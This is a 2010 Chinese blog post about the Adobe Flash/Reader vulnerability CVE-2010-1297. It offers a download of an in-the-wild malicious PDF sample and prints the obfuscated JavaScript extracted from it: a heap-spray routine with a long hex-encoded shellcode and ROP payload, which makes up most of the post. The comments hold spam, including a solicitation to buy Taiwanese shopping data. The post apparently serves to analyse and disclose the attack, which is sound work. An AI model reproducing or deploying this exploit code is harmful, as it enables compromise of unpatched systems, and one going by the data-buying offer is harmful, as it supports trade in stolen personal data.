CVE-2010-1297那个Adobe洞的内幕

Adobe近日发布了一个安全公告,称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞,该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统,Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案,但Flash Player 10.1 Release Candidate不受此漏洞影响,用户可下载使用或采取以下临时解决方案,以避免受到漏洞威胁。


================================================================

pdf样本(解压密码friddy):

点击下载此文件

=======================================================================

解出里面的javascript,看起来此次“并非国人所为”:

各位看客请仔细看!~~!特别注意“第四行”

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();

扩展阅读:

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html



[本日志由 friddy 于 2010-06-09 08:55 AM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 14 | 引用: 0 | 查看次数: 21105
回复回复Dominic[2016-09-03 00:34 AM | del]
eval(ez_write_tag([[580,400],'brighthub_com-netboard-1']));.
With this, without your actually knowing about it, you may have some illicit images and information stored in the computer. As you can see from the screenshot below, we can choose to delete specific information types, or all types at the same time.
回复回复Ermelinda[2016-08-29 10:08 AM | del]
1", the hardrives go from 120 GB to 320 GB of RAM from 1 GB to 4 GB. The components of an uninstaller typically include the following: - Uninstaller: a program remover reverses the modifications that the program made during installation. As you can see from the screenshot below, we can choose to delete specific information types, or all types at the same time.
回复回复Leanna[2016-04-02 10:47 AM | del]
say thanks to a lot for your internet site it helps a lot.
回复回复zhangjiantao[2012-06-04 07:05 PM | del]
confusion之后的巧合
回复回复31876174[2010-12-17 01:14 PM | del]
收 股票流量。股票 shell 有的Q下  643999413
回复回复免费开店[2010-11-28 01:34 PM | del]
| 借博主宝地!祝博主人气越来越旺|
回复回复收台湾购物数据[2010-10-29 02:14 PM | del]
高价收台湾购物数据,能建立稳定供需关系的联系!QQ:869126838
回复回复df[2010-07-13 05:58 PM | del]
嘿嘿。。。。sb="TMD,[CAO,MM";
回复回复中国最大的购物导航[2010-07-03 11:53 PM | del]
中国最大的购物导航www.178wzlt.com



中国最大的购物导航 www.178wzlt.com
回复回复sdh[2010-06-13 11:53 AM | del]
楼上有成功的吗?
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭